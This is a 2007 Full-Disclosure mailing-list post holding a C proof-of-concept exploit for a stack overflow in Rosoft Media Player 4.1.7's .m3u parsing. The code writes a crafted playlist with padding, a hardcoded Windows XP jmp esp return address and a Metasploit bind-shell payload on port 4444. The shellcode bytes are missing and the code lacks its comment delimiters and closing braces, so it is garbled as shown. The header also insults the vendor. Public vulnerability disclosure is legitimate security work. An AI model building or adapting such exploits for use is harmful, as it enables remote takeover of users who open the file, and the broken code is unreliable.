[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Rosoft Media Player <= 4.1.7 .M3U Stack Overflow

/* rosoft-player-expl.c: 2007-12-18:
 * Copyright (c) 2007 devcode
 *          ^^ D E V C O D E ^^
 * Rosoft Media Player <= 4.1.7 .M3U Stack Overflow
 * [0-DAY]
 * Description:
 *    A stack overflow occurs when parsing an .m3u file
 *    which does not contain any delimiters.
 * Hotfix/Patch:
 *    None.
 * Vulnerable systems:
 *    Rosoft Media Player <= 4.1.7
 * Tested on:
 *    Rosoft Media Player 4.1.7
 *    This is a PoC and was created for educational purposes only. The
 *    author is not held responsible if this PoC does not work or is 
 *    used for any other purposes than the one stated above.
 * Notes:
 *    Nothing much here, except the player itself is a piece of shit.
 *    The vulnerability was found by Juan Pablo Lopez Yacubian
 *    (jplopezy_at_gmail.com). Come to think of it, the entire suite
 *    of products offered by Rosoft Engineering sucks bawls.
#include <stdlib.h>
#include <stdio.h>

 * Invalid chars: 0x1A 0xA 0xD 0x00
 * win32_bind - 
 * EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub 
 * http://metasploit.com 
unsigned char uszShellcode[] =

int main( int argc, char **argv ) {
    FILE *f = NULL;
    char *p = NULL;

    printf( "\n\tRosoft Media Player <= 4.1.7 .M3U Stack Overflow\n\n" );
    printf( "\t\tCopyright (c) 2007 devcode\n\n\n" );

    if ( argc < 2 ) {
        printf( "Usage: %s <file>\n", argv[0] );
        return -1;
    f = fopen( argv[1], "w+" );
    if ( !f ) {
        printf( "[-] Unable to create m3u file.\n" );
        return -1;

    p = (char *)malloc( 5000 );
    memset( p, 0x41, 5000 );

     * We need a valid address here that contains 
     * a value of 0 and is writable, and of course, 
     * no 0x00s in the address itself. Try 0x1270FE0  
     * if 0x7FFDFFF0 doesn't work. 
    memcpy( p+4096, "\xF0\xFF\xFD\x7F", 4 );

     * Windows XP SP2 Pro - jmp esp (0x7C941EED, ntdll.dll)
    memcpy( p+4104, "\xED\x1E\x94\x7C", 4 );
    memcpy( p+4108, uszShellcode, sizeof( uszShellcode ) );

     * Cleanup
    fputs( p, f );
    fclose( f );
    free( p );

    printf( "[*] File generated succesfully!\n" );
    return 0;

Share life as it happens with the new Windows Live.
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/